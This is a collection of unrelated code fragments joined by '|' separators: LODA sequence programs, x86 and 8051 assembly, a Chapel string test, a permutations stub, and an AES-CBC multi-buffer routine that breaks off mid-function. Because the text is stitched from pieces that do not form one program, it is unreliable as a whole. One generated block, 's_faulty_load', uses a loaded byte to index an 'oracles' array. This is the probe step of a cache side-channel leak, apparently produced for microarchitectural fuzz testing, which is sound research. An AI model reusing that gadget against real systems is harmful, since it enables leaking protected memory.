extern "C" PEGASUS_EXPORT SchemaSpecialProcessModule * PegasusCreateSSPModule()
{
return(new SampleSSPModule());
}
PEGASUS_NAMESPACE_END
|
; A016892: (5n+3)^8.
; 6561,16777216,815730721,11019960576,78310985281,377801998336,1406408618241,4347792138496,11688200277601,28179280429056,62259690411361,128063081718016,248155780267521,457163239653376
mul $0,5 ; $0 = 5n
add $0,3 ; $0 = 5n+3
pow $0,8 ; $0 = (5n+3)^8
|
; A086112: Denominator of the mean deviation of a discrete uniform distribution on n elements.
; 1,2,3,1,5,2,7,1,9,2,11,1,13,2,15,1,17,2,19,1,21,2,23,1,25,2,27,1,29,2,31,1,33,2,35,1,37,2,39,1,41,2,43,1,45,2,47,1,49,2,51,1,53,2,55,1,57,2,59,1,61,2,63,1,65,2,67,1,69,2,71,1,73,2,75,1,77,2,79,1,81,2,83
mov $1,$0
lpb $1
add $0,1
trn $0,$1
add $1,$0
dif $1,2
lpe
add $0,1
|
; A017746: Binomial coefficients C(n,82).
; 1,83,3486,98770,2123555,36949857,541931236,6890268572,77515521435,783768050065,7210666060598,60962903966874,477542747740513,3489735464257595,23929614612052080,154744841157936784,947812152092362802,5519611944537877494,30664510802988208300,163006083742200475700,831331027085222426070,4077480751894186185010,19275363554408880147320,87996224922301409368200,388649993406831224709550,1663421971781237641756874,6909598959706679434990092,27894306911408446607922964,109584777151961754531125930
add $0,82 ; $0 = n+82
bin $0,82 ; $0 = binomial(n+82,82)
|
; A110213: a(n+3) = 6*a(n) - 5*a(n+2), a(0) = 1, a(1) = -7, a(2) = 35.
; Submitted by Jon Maiga
; 1,-7,35,-169,803,-3805,18011,-85237,403355,-1908709,9032123,-42740485,202250171,-957058117,4528847675,-21430737349,101411338043,-479883604165,2270833596731,-10745699955397,50849198151995,-240620989179589,1138630746165563,-5388058541915845,25496566774501691,-120651049395515077,570926895726080315,-2701655077983391429,12784369093543866683,-60496284093362851525,286271489998913909051,-1354651235433306345157,6410278472606354616635,-30333763423038289628869,143540909702591610073403
mov $2,2
mov $3,2
lpb $0
sub $0,1
mov $1,$3
mul $2,-6
sub $2,2
mov $3,$2
add $2,$1
lpe
mov $0,$3
div $0,2
|
BITS 32
;TEST_FILE_META_BEGIN
;TEST_TYPE=TEST_F
;TEST_IGNOREFLAGS=FLAG_OF|FLAG_SF|FLAG_ZF|FLAG_AF|FLAG_PF|FLAG_CF
;TEST_FILE_META_END
; allocate 16 byte aligned stack space for the packed values
lea ecx, [esp-17]
and ecx, 0xfffffff0
; load 128 bit value into xmm0
mov DWORD [ecx], 0xAABBCCDD
mov DWORD [ecx+4], 0xFFEEDDCC
mov DWORD [ecx+8], 0x11223344
mov DWORD [ecx+12], 0x55667788
movaps xmm0, [ecx]
lea ecx, [ecx+16]
;TEST_BEGIN_RECORDING
lea ecx, [esp-17]
and ecx, 0xfffffff0 ; using this requires us to ignore ALU flags
mov DWORD [ecx], 0xFFEEDDCC
mov DWORD [ecx+4], 0x77665544
mov DWORD [ecx+8], 0x99AABBCC
mov DWORD [ecx+12], 0xDDEEFF00
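; pshuflw selector 0x1a = 0b00011010: dest low words = src words 2,2,1,0; high qword is copied unchanged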
pshuflw xmm0, [ecx], 0x1a
mov ecx, [ecx]
mov ecx, 0
;TEST_END_RECORDING
cvtsi2sd xmm0, ecx
|
;
; Point pixel at (x,y) coordinate.
SECTION code_clib
PUBLIC w_pointxy_MODE4
defc NEEDpoint = 1
.w_pointxy_MODE4
INCLUDE "pixel_MODE4.inc"
|
; put data in RAM
MOV 30H, #'A'
MOV 31H, #'B'
MOV 32H, #'C'
MOV 33H, #0 ; end of data marker
; initialise the display
; see instruction set for details
CLR P1.3 ; clear RS - indicates that instructions are being sent to the module
; function set
CLR P1.7 ; |
CLR P1.6 ; |
SETB P1.5 ; |
CLR P1.4 ; | high nibble set
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
CALL delay ; wait for BF to clear
; function set sent for first time - tells module to go into 4-bit mode
; Why is function set high nibble sent twice? See 4-bit operation on pages 39 and 42 of HD44780.pdf.
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
; same function set high nibble sent a second time
SETB P1.7 ; low nibble set (only P1.7 needed to be changed)
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
; function set low nibble sent
CALL delay ; wait for BF to clear
; entry mode set
; set to increment with no shift
CLR P1.7 ; |
CLR P1.6 ; |
CLR P1.5 ; |
CLR P1.4 ; | high nibble set
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
SETB P1.6 ; |
SETB P1.5 ; |low nibble set
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
CALL delay ; wait for BF to clear
; display on/off control
; the display is turned on, the cursor is turned on and blinking is turned on
CLR P1.7 ; |
CLR P1.6 ; |
CLR P1.5 ; |
CLR P1.4 ; | high nibble set
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
SETB P1.7 ; |
SETB P1.6 ; |
SETB P1.5 ; |
SETB P1.4 ; | low nibble set
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
CALL delay ; wait for BF to clear
; send data
SETB P1.3 ; set RS - indicates that data is being sent to the module
MOV R1, #30H ; data to be sent to LCD is stored in 8051 RAM, starting at location 30H
loop:
MOV A, @R1 ; move data pointed to by R1 to A
JZ finish ; if A is 0, then end of data has been reached - jump out of loop
CALL sendCharacter ; send data in A to LCD module
INC R1 ; point to next piece of data
JMP loop ; repeat
finish:
JMP $
sendCharacter:
MOV C, ACC.7 ; |
MOV P1.7, C ; |
MOV C, ACC.6 ; |
MOV P1.6, C ; |
MOV C, ACC.5 ; |
MOV P1.5, C ; |
MOV C, ACC.4 ; |
MOV P1.4, C ; | high nibble set
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
MOV C, ACC.3 ; |
MOV P1.7, C ; |
MOV C, ACC.2 ; |
MOV P1.6, C ; |
MOV C, ACC.1 ; |
MOV P1.5, C ; |
MOV C, ACC.0 ; |
MOV P1.4, C ; | low nibble set
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
CALL delay ; wait for BF to clear
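; note: there is no RET here - sendCharacter falls through into delay below,
; running the delay a second time; delay's RET then returns to sendCharacter's caller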
delay:
MOV R0, #50
DJNZ R0, $
RET
|
rcl al, 1
rcl ah, 1
rcl bl, 1
rcl bh, 1
rcl cl, 1
rcl ch, 1
rcl dl, 1
rcl dh, 1
rcl byte [bx], 1
rcl byte [bx+si], 1h
rcl byte [bx+si+12h], 1b
rcl byte [bx+si+4142h], 1
rcl al, cl
rcl ah, cl
rcl bl, cl
rcl bh, cl
rcl cl, cl
rcl ch, cl
rcl dl, cl
rcl dh, cl
rcl byte [bx], cl
rcl byte [bx+di], cl
rcl byte [bx+di+12h], cl
rcl byte [bx+di+4142h], cl
rcl ax, 1
rcl bx, 1
rcl cx, 1
rcl dx, 1
rcl si, 1
rcl di, 1
rcl bp, 1
rcl word [bx], 1
rcl word [bx+si], 1h
rcl word [bx+si+12h], 1b
rcl word [bx+si+4142h], 1
rcl ax, cl
rcl bx, cl
rcl cx, cl
rcl dx, cl
rcl si, cl
rcl di, cl
rcl bp, cl
rcl word [bx], cl
rcl word [bx+di], cl
rcl word [bx+di+12h], cl
rcl word [bx+si+12h], cl
|
/*
* Copyright 2021 Hewlett Packard Enterprise Development LP
* Other additional copyright holders may be indicated within.
*
* The entirety of this work is licensed under the Apache License,
* Version 2.0 (the "License"); you may not use this file except
* in compliance with the License.
*
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "chpl/queries/Context.h"
#include "chpl/queries/UniqueString.h"
// always check assertions in this test
#ifdef NDEBUG
#undef NDEBUG
#endif
#include <chrono>
#include <fstream>
#include <sstream>
#include <string>
#include <iostream>
#include <cassert>
using namespace chpl;
static void testPerformance(Context* ctx,
const char* inputFile,
bool printTiming) {
int outerRepeat = 10;
int innerRepeat = 1;
bool dohisto = false;
int querybysize[41];
int nqueries = 0;
for(int i = 0; i < 41; i++) querybysize[i] = 0;
auto start = std::chrono::steady_clock::now();
for (int i = 0; i < outerRepeat; i++) {
std::ifstream file(inputFile);
if (file.is_open()) {
std::string line;
std::string word;
while (std::getline(file, line)) {
for (int j = 0; j < innerRepeat; j++) {
std::istringstream iss(line, std::istringstream::in);
while (iss >> word) {
// double the word length to better match
// statistics of Chapel code
word += word;
if (dohisto) {
int len = word.size();
if (len > 40) len = 40;
querybysize[len]++;
nqueries++;
}
UniqueString::build(ctx, word);
}
}
}
file.close();
} else {
std::cerr << "could not open file " << inputFile << "\n";
exit(-1);
}
}
auto end = std::chrono::steady_clock::now();
std::chrono::duration<double> elapsed = end - start;
if (printTiming) {
std::cout << "unordered map elapsed time: " << elapsed.count() << " s\n";
if (dohisto) {
std::cout << "Queried " << nqueries << " strings\n";
int sum = 0;
for(int i = 0; i < 40; i++) {
std::cout << "length < " << i << " -- " << sum << "\n";
sum += querybysize[i];
std::cout << "length " << i << " -- " << querybysize[i] << "\n";
}
std::cout << "length >= 40 " << " -- " << querybysize[40] << "\n";
}
}
}
static void test0() {
Context context;
Context* ctx = &context;
// First, add some strings to the map and make sure we get uniqueness.
// needs to be long enough to require strdup etc.
#define TEST1STRING "this is a very very very long string"
std::string test1 = TEST1STRING;
std::string test1Copy = test1;
assert(test1.c_str() != test1Copy.c_str());
const char* t1 = ctx->uniqueCString(test1.c_str());
const char* t2 = ctx->uniqueCString(test1Copy.c_str());
const char* t3 = ctx->uniqueCString(TEST1STRING);
assert(t1 == t2);
assert(t2 == t3);
// this string is short enough to be inlined
std::string hello = "hello";
const char* h1 = ctx->uniqueCString("hello");
const char* h2 = ctx->uniqueCString(hello.c_str());
assert(h1 == h2);
// check that uniqueString(NULL) == uniqueString("")
assert(ctx->uniqueCString(nullptr) == ctx->uniqueCString(""));
// check that uniqueString(NULL) != nullptr
assert(ctx->uniqueCString(nullptr) != nullptr);
const char* x = ctx->uniqueCString("aVeryLongIdentifierName");
assert(x != h1 && x != nullptr);
}
static void test1() {
Context context;
Context* ctx = &context;
// First, add some strings to the map and make sure we get uniqueness.
// needs to be long enough to require strdup etc.
#define TEST1STRING "this is a very very very long string"
std::string test1 = TEST1STRING;
std::string test1Copy = test1;
assert(test1.c_str() != test1Copy.c_str());
UniqueString t1 = UniqueString::build(ctx, test1);
UniqueString t2 = UniqueString::build(ctx, test1Copy);
UniqueString t3 = UniqueString::build(ctx, TEST1STRING);
assert(t1.c_str() == t2.c_str());
assert(t2.c_str() == t3.c_str());
// this string is short enough to be inlined
std::string hello = "hello";
UniqueString h1 = UniqueString::build(ctx, "hello");
UniqueString h2 = UniqueString::build(ctx, hello);
assert(h1 == h2);
// check that uniqueString(NULL) == uniqueString("")
assert(UniqueString::build(ctx, NULL) == UniqueString::build(ctx, ""));
// check that default-constructed unique string matches one from ""
UniqueString empty;
assert(empty == UniqueString::build(ctx, ""));
// check ==
assert(t1 == t2);
assert(!(t1 != t2));
assert(h1 != t1);
assert(!(h1 == t1));
// test copy init
UniqueString t1Copy = t1;
UniqueString h1Copy = h1;
assert(t1Copy == t1);
assert(h1Copy == h1);
// test assignment
UniqueString t1assign;
UniqueString h1assign;
t1assign = t1;
h1assign = h1;
assert(t1assign == t1);
assert(h1assign == h1);
// test swap
t1Copy.swap(h1Copy);
assert(t1Copy == h1);
assert(h1Copy == t1);
// test hash
assert(t1.hash() != h1.hash());
}
int main(int argc, char** argv) {
const char* inputFile = "moby.txt";
std::string timingArg = "--timing";
bool printTiming = false;
for (int i = 1; i < argc; i++) {
if (argv[i] == timingArg)
printTiming = true;
else
inputFile = argv[i];
}
test0();
test1();
Context context;
Context* ctx = &context;
// Next, measure performance
testPerformance(ctx, inputFile, printTiming);
return 0;
}
|
#include <vector>
#include "permutations.hpp"
Permutations::Permutations(int n) : len(n) {
// create an n-element vector: [1, 2, 3, ..., n]
std::vector<int> toPermute(n);
for(int i = 0; i < len; i++) {
toPermute[i] = i + 1;
}
// apply the permutation algorithm
// the complexity is O(n*n!) because of recursion.
}
Permutations::Permutations(std::vector<int> &toPermute) : len(toPermute.size()) {
// apply the permutation algorithm.
}
int Permutations::length() {return len;}
std::vector<std::vector<int>> Permutations::elements() {
// return the list of all the permutations.
// placeholder until the algorithm lands: falling off the end of a
// value-returning function is undefined behaviour, so return empty
return {};
}
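Until the recursive algorithm is filled in, a compact reference for what elements() is meant to produce, using std::next_permutation (a sketch, not the O(n*n!) recursion the comments describe):

#include <algorithm>
#include <vector>

// All permutations of [1..n] in lexicographic order; n! results.
std::vector<std::vector<int>> allPermutations(int n) {
    std::vector<int> cur(n);
    for (int i = 0; i < n; ++i) cur[i] = i + 1;
    std::vector<std::vector<int>> out;
    do {
        out.push_back(cur);
    } while (std::next_permutation(cur.begin(), cur.end()));
    return out;
}
|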
.global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r9
push %rax
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WT_ht+0x3f4f, %rax
nop
nop
nop
sub %r12, %r12
movups (%rax), %xmm1
vpextrq $1, %xmm1, %r9
nop
dec %rbp
lea addresses_WC_ht+0xcacf, %rsi
nop
nop
nop
xor $318, %rdx
mov (%rsi), %rcx
nop
add $47318, %r12
lea addresses_WT_ht+0x1d6cf, %rsi
lea addresses_A_ht+0x1404f, %rdi
nop
add %r9, %r9
mov $90, %rcx
rep movsq
nop
nop
and $52466, %rsi
lea addresses_D_ht+0x15e4f, %r12
nop
nop
nop
nop
nop
and $1537, %r9
movb (%r12), %cl
nop
add %r9, %r9
lea addresses_A_ht+0x1e79f, %r12
and %rdi, %rdi
movups (%r12), %xmm6
vpextrq $0, %xmm6, %rcx
nop
nop
nop
nop
nop
xor $43272, %r12
lea addresses_D_ht+0x44a3, %rsi
lea addresses_WC_ht+0x153cf, %rdi
nop
nop
nop
and $3885, %rdx
mov $19, %rcx
rep movsl
dec %r9
lea addresses_UC_ht+0x12acf, %rsi
lea addresses_A_ht+0xfb4f, %rdi
nop
xor %rdx, %rdx
mov $35, %rcx
rep movsb
nop
nop
nop
nop
xor %rsi, %rsi
lea addresses_D_ht+0x1df4f, %r12
nop
nop
nop
add %rdx, %rdx
mov $0x6162636465666768, %r9
movq %r9, (%r12)
nop
nop
nop
nop
xor %rsi, %rsi
lea addresses_WC_ht+0x73cf, %rdi
inc %rcx
mov $0x6162636465666768, %rax
movq %rax, %xmm0
movups %xmm0, (%rdi)
nop
nop
nop
nop
sub $9618, %r12
lea addresses_D_ht+0x634f, %rsi
lea addresses_D_ht+0x104cf, %rdi
clflush (%rsi)
nop
and %r12, %r12
mov $9, %rcx
rep movsl
nop
nop
nop
nop
nop
xor %rcx, %rcx
lea addresses_WT_ht+0x17b4f, %r9
clflush (%r9)
add $65193, %rax
movb (%r9), %dl
nop
nop
nop
nop
and %r12, %r12
lea addresses_UC_ht+0x1af4f, %rax
nop
nop
nop
xor %rdi, %rdi
movw $0x6162, (%rax)
dec %rdi
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbp
pop %rax
pop %r9
pop %r12
ret
.global s_faulty_load
s_faulty_load:
push %r13
push %r9
push %rbp
push %rdi
push %rdx
// Faulty Load
lea addresses_RW+0x1634f, %rdi
nop
nop
dec %r9
mov (%rdi), %r13d
lea oracles, %r9
and $0xff, %r13
shlq $12, %r13
mov (%r9,%r13,1), %r13
pop %rdx
pop %rdi
pop %rbp
pop %r9
pop %r13
ret
/*
<gen_faulty_load>
[REF]
{'src': {'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 0, 'same': False, 'type': 'addresses_RW'}, 'OP': 'LOAD'}
[Faulty Load]
{'src': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 0, 'same': True, 'type': 'addresses_RW'}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 10, 'same': False, 'type': 'addresses_WT_ht'}, 'OP': 'LOAD'}
{'src': {'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 7, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 3, 'same': False, 'type': 'addresses_WT_ht'}, 'dst': {'congruent': 8, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'REPM'}
{'src': {'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 8, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'LOAD'}
{'src': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 4, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 2, 'same': False, 'type': 'addresses_D_ht'}, 'dst': {'congruent': 7, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'REPM'}
{'src': {'congruent': 7, 'same': False, 'type': 'addresses_UC_ht'}, 'dst': {'congruent': 11, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'REPM'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 10, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'STOR'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 7, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'STOR'}
{'src': {'congruent': 11, 'same': False, 'type': 'addresses_D_ht'}, 'dst': {'congruent': 7, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'REPM'}
{'src': {'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 9, 'same': True, 'type': 'addresses_WT_ht'}, 'OP': 'LOAD'}
{'dst': {'NT': True, 'AVXalign': False, 'size': 2, 'congruent': 9, 'same': False, 'type': 'addresses_UC_ht'}, 'OP': 'STOR'}
{'32': 21829}
32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32
*/
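The faulty-load block above is the interesting part: one byte of the loaded value is scaled by 4096 and used to index into `oracles`, so a later cache-timing pass can recover the byte. A hedged C++ model of that probe step (the surrounding buffers and the timing pass are out of scope here):

#include <cstdint>

extern uint8_t oracles[256 * 4096];  // one 4 KiB-strided slot per byte value

// Mirrors: and $0xff, %r13 / shlq $12, %r13 / mov (%r9,%r13,1), %r13
inline uint8_t probe(uint64_t loaded) {
    return oracles[(loaded & 0xff) << 12];
}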
|
;;
;; Copyright (c) 2019, Intel Corporation
;;
;; Redistribution and use in source and binary forms, with or without
;; modification, are permitted provided that the following conditions are met:
;;
;; * Redistributions of source code must retain the above copyright notice,
;; this list of conditions and the following disclaimer.
;; * Redistributions in binary form must reproduce the above copyright
;; notice, this list of conditions and the following disclaimer in the
;; documentation and/or other materials provided with the distribution.
;; * Neither the name of Intel Corporation nor the names of its contributors
;; may be used to endorse or promote products derived from this software
;; without specific prior written permission.
;;
;; THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
;; AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
;; IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
;; DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
;; FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
;; DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
;; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
;; CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
;; OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
;; OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
;;
%include "include/os.asm"
%include "job_aes_hmac.asm"
%include "mb_mgr_datastruct.asm"
%include "include/reg_sizes.asm"
%include "include/const.inc"
%ifndef AES_CBC_ENC_X16
%define AES_CBC_ENC_X16 aes_cbc_enc_128_vaes_avx512
%define NUM_KEYS 11
%define SUBMIT_JOB_AES_ENC submit_job_aes128_enc_vaes_avx512
%endif
; void AES_CBC_ENC_X16(AES_ARGS_x16 *args, UINT64 len_in_bytes);
extern AES_CBC_ENC_X16
section .text
%ifdef LINUX
%define arg1 rdi
%define arg2 rsi
%else
%define arg1 rcx
%define arg2 rdx
%endif
%define state arg1
%define job arg2
%define len2 arg2
%define job_rax rax
%if 1
; idx needs to be in rbp
%define len rbp
%define idx rbp
%define tmp r10
%define tmp2 r11
%define tmp3 r12
%define lane r8
%define iv r9
%define unused_lanes rbx
%endif
; STACK_SPACE needs to be an odd multiple of 8
; This routine and its callee clobbers all GPRs
struc STACK
_gpr_save: resq 8
_rsp_save: resq 1
endstruc
%macro INSERT_KEYS 6
%define %%KP %1 ; [in] GP reg with pointer to expanded keys
%define %%LANE %2 ; [in] GP reg with lane number
%define %%NKEYS %3 ; [in] number of round keys (numerical value)
%define %%COL %4 ; [clobbered] GP reg
%define %%ZTMP %5 ; [clobbered] ZMM reg
%define %%IA0 %6 ; [clobbered] GP reg
%assign ROW (16*16)
mov %%COL, %%LANE
shl %%COL, 4
lea %%IA0, [state + _aes_args_key_tab]
add %%COL, %%IA0
vmovdqu64 %%ZTMP, [%%KP]
vextracti64x2 [%%COL + ROW*0], %%ZTMP, 0
vextracti64x2 [%%COL + ROW*1], %%ZTMP, 1
vextracti64x2 [%%COL + ROW*2], %%ZTMP, 2
vextracti64x2 [%%COL + ROW*3], %%ZTMP, 3
vmovdqu64 %%ZTMP, [%%KP + 64]
vextracti64x2 [%%COL + ROW*4], %%ZTMP, 0
vextracti64x2 [%%COL + ROW*5], %%ZTMP, 1
vextracti64x2 [%%COL + ROW*6], %%ZTMP, 2
vextracti64x2 [%%COL + ROW*7], %%ZTMP, 3
%if %%NKEYS > 11 ; 192 or 256 - copy 4 more keys
vmovdqu64 %%ZTMP, [%%KP + 128]
vextracti64x2 [%%COL + ROW*11], %%ZTMP, 3
%else ; 128 - copy 3 more keys
mov %%IA0, 0x3f
kmovq k1, %%IA0
vmovdqu64 %%ZTMP{k1}{z}, [%%KP + 128]
%endif
vextracti64x2 [%%COL + ROW*8], %%ZTMP, 0
vextracti64x2 [%%COL + ROW*9], %%ZTMP, 1
vextracti64x2 [%%COL + ROW*10], %%ZTMP, 2
%if %%NKEYS == 15 ; 256 - 3 more keys
mov %%IA0, 0x3f
kmovq k1, %%IA0
vmovdqu64 %%ZTMP{k1}{z}, [%%KP + 192]
vextracti64x2 [%%COL + ROW*12], %%ZTMP, 0
vextracti64x2 [%%COL + ROW*13], %%ZTMP, 1
vextracti64x2 [%%COL + ROW*14], %%ZTMP, 2
%elif %%NKEYS == 13 ; 192 - 1 more key
mov %%IA0, 0x3
kmovq k1, %%IA0
vmovdqu64 %%ZTMP{k1}{z}, [%%KP + 192]
vextracti64x2 [%%COL + ROW*12], %%ZTMP, 0
%endif
%endmacro
; JOB* SUBMIT_JOB_AES_ENC(MB_MGR_AES_OOO *state, JOB_AES_HMAC *job)
; arg 1 : state
; arg 2 : job
MKGLOBAL(SUBMIT_JOB_AES_ENC,function,internal)
SUBMIT_JOB_AES_ENC:
mov rax, rsp
sub rsp, STACK_size
and rsp, -16
mov [rsp + _gpr_save + 8*0], rbx
mov [rsp + _gpr_save + 8*1], rbp
mov [rsp + _gpr_save + 8*2], r12
mov [rsp + _gpr_save + 8*3], r13
mov [rsp + _gpr_save + 8*4], r14
mov [rsp + _gpr_save + 8*5], r15
%ifndef LINUX
mov [rsp + _gpr_save + 8*6], rsi
mov [rsp + _gpr_save + 8*7], rdi
%endif
mov [rsp + _rsp_save], rax ; original SP
mov unused_lanes, [state + _aes_unused_lanes]
mov lane, unused_lanes
and lane, 0xF
shr unused_lanes, 4
mov len, [job + _msg_len_to_cipher_in_bytes]
and len, -16 ; DOCSIS may pass size unaligned to block size
mov iv, [job + _iv]
mov [state + _aes_unused_lanes], unused_lanes
add qword [state + _aes_lanes_in_use], 1
mov [state + _aes_job_in_lane + lane*8], job
;; Update lane len
vmovdqa64 ymm0, [state + _aes_lens]
mov tmp2, rcx ; save rcx
mov rcx, lane
mov tmp, 1
shl tmp, cl
mov rcx, tmp2 ; restore rcx
kmovq k1, tmp
vpbroadcastw ymm1, WORD(len)
vmovdqu16 ymm0{k1}, ymm1
vmovdqa64 [state + _aes_lens], ymm0
;; Find min length for lanes 0-7
vphminposuw xmm2, xmm0
;; Update input pointer
mov tmp, [job + _src]
add tmp, [job + _cipher_start_src_offset_in_bytes]
vmovdqu xmm1, [iv]
mov [state + _aes_args_in + lane*8], tmp
;; Insert expanded keys
mov tmp, [job + _aes_enc_key_expanded]
INSERT_KEYS tmp, lane, NUM_KEYS, tmp2, zmm4, tmp3
;; Update output pointer
mov tmp, [job + _dst]
mov [state + _aes_args_out + lane*8], tmp
shl lane, 4 ; multiply by 16
vmovdqa [state + _aes_args_IV + lane], xmm1
cmp qword [state + _aes_lanes_in_use], 16
jne return_null
; Find min length for lanes 8-15
vpextrw DWORD(len2), xmm2, 0 ; min value
vpextrw DWORD(idx), xmm2, 1 ; min index
vextracti128 xmm1, ymm0, 1
vphminposuw xmm2, xmm1
vpextrw DWORD(tmp), xmm2, 0 ; min value
cmp DWORD(len2), DWORD(tmp)
jle use_min
vpextrw DWORD(idx), xmm2, 1 ; min index
add DWORD(idx), 8 ; index is into lanes 8-15
mov len2, tmp ; min len
use_min:
cmp len2, 0
je len_is_0
vpbroadcastw ymm3, WORD(len2)
vpsubw ymm0, ymm0, ymm3
vmovdqa [state + _aes_lens], ymm0
